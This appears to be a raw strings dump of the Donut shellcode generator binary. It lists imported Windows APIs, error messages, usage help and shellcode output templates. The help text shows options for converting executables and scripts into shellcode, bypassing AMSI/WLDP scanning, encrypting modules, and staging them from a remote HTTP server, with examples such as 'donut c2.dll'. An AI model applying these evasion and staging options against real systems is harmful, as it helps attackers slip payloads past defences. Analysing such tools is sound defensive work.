wininet.dll
InternetCloseHandle
wininet.dll
HttpOpenRequestA
wininet.dll
HttpSendRequestA
wininet.dll
HttpQueryInfoA
mscoree.dll
CorBindToRuntime
mscoree.dll
CLRCreateInstance
ole32.dll
CoInitializeEx
ole32.dll
CoCreateInstance
ole32.dll
CoUninitialize
>"g/
)+c6
Xntdll
RtlGetCompressionWorkSpaceSize
RtlCompressBuffer
.vbs
.exe
.dll
v4.0.30319
HMN34P67R9TWCXYF
.data
ole32;oleaut32;wininet;mscoree;shell32
WScript
wscript.exe
amsi
AmsiInitialize
AmsiScanBuffer
AmsiScanString
wldp
WldpQueryDynamicCodeTrust
WldpIsClassInApprovedList
kernelbase
ExitProcess;exit;_exit;_cexit;_c_exit;quick_exit;_Exit
_acmdln;__argv;__p__acmdln;__p___argv;_wcmdln;__wargv;__p__wcmdln;__p___wargv
loader.bin
loader.b64
loader.rb
loader.c
amd64
Xpress
loader.py
loader.ps1
loader.cs
loader.hex
http://
https://
No error.
File not found.
File is empty.
Cannot open file.
File is invalid.
File is a .NET DLL. Donut requires a class and method.
Memory allocation failed.
Invalid architecture specified.
Invalid URL.
Invalid URL length.
Invalid parameter.
Error generating random values.
Invalid bypass option specified.
Unable to locate DLL function provided. Names are case sensitive.
Target architecture cannot support selected DLL/EXE file.
The output format is invalid.
The compression engine is invalid.
You've supplied parameters for an unmanaged DLL. Donut also requires a DLL function.
There was an error during compression.
This file has no relocation information required for in-memory execution.
Invalid entropy level specified.
  [ %c%c requires parameter
 usage: donut [options] <EXE/DLL/VBS/JS>
       Only the finest artisanal donuts are made of shells.
                   -MODULE OPTIONS-
       -n <name>            Module name for HTTP staging. If entropy is enabled, this is generated randomly.
       -s <server>          HTTP server that will host the donut module.
       -e <level>           Entropy. 1=None, 2=Use random names, 3=Random names + symmetric encryption (default)
                   -PIC/SHELLCODE OPTIONS-
                   -FILE OPTIONS-
       -a <arch>            Target architecture : 1=x86, 2=amd64, 3=x86+amd64(default).
       -b <level>           Bypass AMSI/WLDP : 1=None, 2=Abort on fail, 3=Continue on fail.(default)
    donut c2.dll
       -o <path>            Output file to save loader. Default is "loader.bin"
 examples:
HTTP
       -f <format>          Output format. 1=Binary (default), 2=Base64, 3=C, 4=Ruby, 5=Python, 6=Powershell, 7=C#, 8=Hex
       -y <addr>            Create thread for loader and continue execution at <addr> supplied.
x86+amd64
  [ Donut shellcode generator v0.9.3
       -x <action>          Exiting. 1=Exit thread (default), 2=Exit process
       -c <namespace.class> Optional class name. (required for .NET DLL)
       -d <name>            AppDomain name to create for .NET assembly. If entropy is enabled, this is generated randomly.
       -m <method | api>    Optional method or function for DLL. (a method is required for .NET DLL)
  [ Error : %s
JScript
       -p <arguments>       Optional parameters/command line inside quotations for DLL method/function or EXE.
       -w                   Command line is passed to unmanaged DLL function in UNICODE format. (default is ANSI)
Unrecognized
  [ Instance type : %s
       -r <version>         CLR runtime version. MetaHeader used by default or v4.0.30319 if none available.
       -t                   Execute the entrypoint of an unmanaged EXE as a thread.
None
       -z <engine>          Pack/Compress file. 1=None, 2=aPLib, 3=LZNT1, 4=Xpress, 5=Xpress Huffman
  [ Entropy       : %s
    donut -a1 -cTestClass -mRunProcess -pnotepad.exe loader.dll
  [ Copyright (c) 2019 TheWover, Odzhan
Random Names
aPLib
    donut loader.dll -c TestClass -m RunProcess -p"calc notepad" -s http://remote_server.com/modules/
Embedded
.NET DLL
.NET EXE
VBScript
  [ Module file   : "%s"
Random names + Encryption
LZNT1
Xpress Huffman
  [ Compressed    : %s (Reduced by %d%%)
  [ File type     : %s
  [ Class         : %s
  [ Method        : %s
DllMain
  [ Function      : %s
  [ Parameters    : %s
  [ Target CPU    : %s
  [ Module name   : %s
  [ Upload to     : %s
none
abort
continue
  [ AMSI/WDLP     : %s
  [ Shellcode     : "%s"
  [ OEP           : 0x%llX
unsigned char buf[] = 
\x%02x
buf   = ""
buff += "
\x%02x
[Byte[]] $buf = 
0x%02x
byte[] my_buf = new byte[%d] {
0x%02x
\x%02x
                          
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
                          
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
